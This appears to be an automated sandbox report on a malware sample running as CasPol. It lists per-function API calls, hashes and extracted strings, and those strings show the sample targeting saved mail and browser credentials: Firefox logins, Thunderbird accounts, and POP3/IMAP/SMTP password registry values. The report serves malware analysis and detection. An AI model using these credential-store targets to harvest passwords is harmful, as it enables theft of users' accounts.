                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                                                                                                                                    • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                                    • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                    • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                    • API String ID: 1714764973-479759155
                                                                                                                                                                                                                    • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                                    • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                    • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                    • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                    • API String ID: 2814039832-2206097438
                                                                                                                                                                                                                    • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                                    • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                                                    • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                    • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                    • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                    • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                      • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                      • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                      • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                    • API String ID: 2303586283-933021314
                                                                                                                                                                                                                    • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                                    • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
